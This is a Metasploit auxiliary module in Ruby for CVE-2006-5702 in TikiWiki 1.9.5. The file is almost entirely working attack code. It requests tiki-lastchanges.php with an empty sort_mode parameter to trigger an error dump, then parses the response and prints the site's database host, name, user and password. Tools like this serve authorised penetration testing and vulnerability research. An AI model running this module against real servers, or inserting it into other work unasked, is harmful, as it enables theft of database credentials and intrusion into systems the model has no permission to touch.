##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
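class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Key patterns searched for in the response body, paired with the label
  # printed for each. Judging by the patterns, the body is expected to look
  # like PHP var_dump output: a `["key"]=>` line followed by a
  # `string(N) "value"` line, so every value is read from the line after
  # the key. The regexes are the ones the module has always used.
  DB_FIELDS = [
    [/\["file"\]=>/,         'Install path'],
    [/\["databaseType"\]=>/, 'DB type'],
    [/\["database"\]=>/,     'DB name'],
    [/\["host"\]=>/,         'DB host'],
    [/\["user"\]=>/,         'DB user'],
    [/\["password"\]=>/,     'DB password']
  ].freeze

  # Matches a dumped string value line; capture 1 is the value itself.
  VALUE_RE = /string\(\d+\) "(.*)"/m

  # Module metadata and the single URI option (TikiWiki directory path).
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'TikiWiki Information Disclosure',
      'Description' => %q{
        A vulnerability has been reported in Tikiwiki, which can be exploited by
        an anonymous user to dump the MySQL user & passwd just by creating a mysql
        error with the "sort_mode" var.

        The vulnerability was reported in Tikiwiki version 1.9.5.
      },
      'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['OSVDB', '30172'],
          ['BID', '20858'],
          ['CVE', '2006-5702'],
          ['URL', 'https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/'],
        ],
      'DisclosureDate' => '2006-11-01',
      'Actions' =>
        [
          ['Dump', 'Description' => 'Dump user and password']
        ],
      'DefaultAction' => 'Dump'
    ))

    register_options(
      [
        OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
      ])
  end

  # Requests tiki-lastchanges.php under the configured URI with an empty
  # sort_mode parameter and reports the database settings found in the
  # response body.
  #
  # Prints one status line per field found (see DB_FIELDS), a single
  # "could not obtain" line when none of the key patterns appear, and a
  # "no response" line when the request yields nothing or the HTTP reason
  # phrase is not "OK".
  #
  # @return [void]
  def run
    print_status("Establishing a connection to the target...")

    uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')
    rpath = uri + "?days=1&offset=0&sort_mode="

    # 25-second request timeout, unchanged from the original module.
    res = send_request_raw({
      'uri' => rpath,
      'method' => 'GET',
      'headers' =>
        {
          'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
          'Connection' => 'Close',
        }
    }, 25)

    unless res && res.message == "OK"
      print_status("No response from the server.")
      return
    end

    print_status("Get information about database...")

    found = report_db_fields(res.body.split(/\r?\n/))
    print_status("Could not obtain information about database.") if found.zero?
  end

  private

  # Scans `lines` for the DB_FIELDS key patterns and prints the value taken
  # from the line that follows each match. Stops once DB_FIELDS.size key
  # lines have been matched (the original capped its counter at six).
  #
  # The body is untrusted server output: a key line at the very end of the
  # body, or a following line that does not carry a `string(N) "..."` value,
  # used to raise NoMethodError on the nil match and abort the run. Such
  # cases are now reported as unparsed and counted as found, so the
  # "could not obtain" summary keeps its original meaning.
  #
  # @param lines [Array<String>] response body split on line endings
  # @return [Integer] number of key lines matched
  def report_db_fields(lines)
    found = 0

    lines.each_with_index do |row, idx|
      break if found >= DB_FIELDS.size

      DB_FIELDS.each do |key_re, label|
        next unless row.match(key_re)

        found += 1
        next_line = lines[idx + 1]
        value = next_line && next_line.match(VALUE_RE)
        if value
          print_status("#{label} : #{value[1]}")
        else
          print_status("#{label} : (value not found on the following line)")
        end
      end
    end

    found
  end
end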